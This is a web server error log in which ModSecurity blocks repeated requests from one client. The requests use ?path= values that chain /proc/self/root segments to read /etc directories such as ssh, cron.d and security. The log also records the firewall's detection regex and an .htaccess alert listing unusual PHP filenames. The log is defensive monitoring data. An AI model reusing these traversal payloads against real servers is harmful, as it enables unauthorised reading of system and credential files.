[Thu Mar 19 10:55:46.315389 2026] [:error] [pid 30077:tid 140411590858496] [client 74.7.243.128:39944] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwAYvu8EFLIOrSqIpumWgAAAlI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 10:55:50.668998 2026] [:error] [pid 17887:tid 140411741927168] [client 74.7.243.128:39956] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwAZgkwaGbbGflqUZDBRQAAAMA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 10:55:57.053842 2026] [proxy_fcgi:error] [pid 14269:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:50356] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 10:56:00.404190 2026] [:error] [pid 14269:tid 140411699963648] [client 74.7.244.43:52168] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abwAbwbLMZ6AikZjR9Vd4gAAAAU"]
[Thu Mar 19 10:56:00.405459 2026] [:error] [pid 26799:tid 140411565680384] [client 74.7.243.128:57370] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwAb9a6ubjKNq_cu4ZTiAAAA1U"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 10:56:06.978665 2026] [:error] [pid 31803:tid 140411624429312] [client 74.7.243.128:39160] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwAduyqAr6etmhZHNphDAAAAE4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 10:56:33.137869 2026] [proxy_fcgi:error] [pid 27293:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:51098] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 10:57:03.133797 2026] [proxy_fcgi:error] [pid 27293:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:51828] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 10:57:04.468441 2026] [core:alert] [pid 17653:tid 140411574073088] [client 57.141.18.72:53890] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </IfModule>custom-header.php|ms-delete-site.php|options-permalink.php|term.php|customize.php|link-add.php|ms-edit.php|options.php|edit-comments.php|link-manager.php|ms-options.php|options-reading.php|system_log.php|inputs.php|adminfuns.php|chtmlfuns.php|cjfuns.php|classsmtps.php|classfuns.php|comfunctions.php|comdofuns.php|connects.php|copypaths.php|delpaths.php|doiconvs.php|epinyins.php|filefuns.php|gdftps.php|hinfofuns.php|hplfuns.php|memberfuns.php|moddofuns.php|onclickfuns.php|phpzipincs.php|qfunctions.php|qinfofuns.php|schallfuns.php|tempfuns.php|userfuns.php|siteheads.php|termps.php|txets.php|thoms.php|postnews.php|txets.php)$'> without matching <IfModule>custom-header.php|ms-delete-site.php|options-permalink.php|term.php|customize.php|link-add.php|ms-edit.php|options.php|edit-comments.php|link-manager.php|ms-options.php|options-reading.php|system_log.php|inputs.php|adminfuns.php|chtmlfuns.php|cjfuns.php|classsmtps.php|classfuns.php|comfunctions.php|comdofuns.php|connects.php|copypaths.php|delpaths.php|doiconvs.php|epinyins.php|filefuns.php|gdftps.php|hinfofuns.php|hplfuns.php|memberfuns.php|moddofuns.php|onclickfuns.php|phpzipincs.php|qfunctions.php|qinfofuns.php|schallfuns.php|tempfuns.php|userfuns.php|siteheads.php|termps.php|txets.php|thoms.php|postnews.php|txets.php)$'> section
[Thu Mar 19 10:57:14.310487 2026] [core:alert] [pid 31803:tid 140411716749056] [client 57.141.18.48:54094] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 10:57:28.069982 2026] [proxy_fcgi:error] [pid 15826:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:52444] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 10:57:53.121801 2026] [proxy_fcgi:error] [pid 19093:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:52992] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 10:58:15.544320 2026] [:error] [pid 26799:tid 140411574073088] [client 74.7.243.128:46690] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwA99a6ubjKNq_cu4ZT3wAAA1Q"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 10:58:16.038316 2026] [proxy_fcgi:error] [pid 30077:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:53486] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 10:58:32.978081 2026] [core:alert] [pid 30077:tid 140411691570944] [client 74.7.243.128:51138] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/var/log
[Thu Mar 19 10:58:35.313431 2026] [mime_magic:error] [pid 26799:tid 140411540502272] (70014)End of file found: [client 57.141.18.85:55724] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 10:58:39.126599 2026] [proxy_fcgi:error] [pid 31803:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:54086] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 10:59:02.141704 2026] [proxy_fcgi:error] [pid 19093:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:54646] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 10:59:02.875335 2026] [:error] [pid 27293:tid 140411540502272] [client 74.7.243.128:54230] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwBJv-YZRR_7pZ7nDKMpwAAA9g"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 10:59:05.846432 2026] [:error] [pid 15826:tid 140411649607424] [client 74.7.243.128:55574] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwBKeoXxyEfFpUF8f8PDgAAAUs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 10:59:13.483737 2026] [:error] [pid 30077:tid 140411741927168] [client 74.7.243.128:55584] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwBMfu8EFLIOrSqIpum1wAAAkA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 10:59:13.897785 2026] [:error] [pid 17887:tid 140411641214720] [client 74.7.228.61:48548] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abwBMQkwaGbbGflqUZDBzwAAAMw"]
[Thu Mar 19 10:59:15.874926 2026] [:error] [pid 17653:tid 140411666392832] [client 74.7.243.128:51804] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwBM8df6f5d65gmYZR3wwAAAsk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 10:59:24.115241 2026] [proxy_fcgi:error] [pid 17653:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:55166] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 10:59:31.168991 2026] [:error] [pid 26799:tid 140411641214720] [client 74.7.243.128:51814] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwBQ9a6ubjKNq_cu4ZUEAAAA0w"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 10:59:33.650368 2026] [:error] [pid 19093:tid 140411674785536] [client 74.7.243.128:46762] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwBRV_V7PWP6ixUYl69NgAAAog"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 10:59:47.133783 2026] [proxy_fcgi:error] [pid 19093:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:55780] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 10:59:54.924641 2026] [:error] [pid 17653:tid 140411674785536] [client 74.7.243.128:46770] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwBWsdf6f5d65gmYZR31gAAAsg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 10:59:59.647475 2026] [:error] [pid 27403:tid 140411741927168] [client 74.7.243.128:44890] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwBXxkFeYa1D6dYQnDxHgAAAcA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 11:00:10.122039 2026] [proxy_fcgi:error] [pid 27293:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:56312] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 11:00:21.235175 2026] [:error] [pid 31803:tid 140411691570944] [client 74.7.243.128:33648] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwBdeyqAr6etmhZHNphrwAAAEY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 11:00:30.844290 2026] [:error] [pid 14269:tid 140411548894976] [client 74.7.243.128:41436] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwBfgbLMZ6AikZjR9VeYQAAABc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 11:00:33.127520 2026] [proxy_fcgi:error] [pid 14269:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:56830] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 11:00:34.129059 2026] [:error] [pid 26799:tid 140411691570944] [client 74.7.243.128:54162] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwBgta6ubjKNq_cu4ZUMwAAA0Y"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 11:00:34.393091 2026] [:error] [pid 26799:tid 140411565680384] [client 74.7.243.128:54162] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwBgta6ubjKNq_cu4ZUNAAAA1U"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 11:00:41.035770 2026] [:error] [pid 17887:tid 140411691570944] [client 74.7.243.128:54178] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwBiQkwaGbbGflqUZDCDAAAAMY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
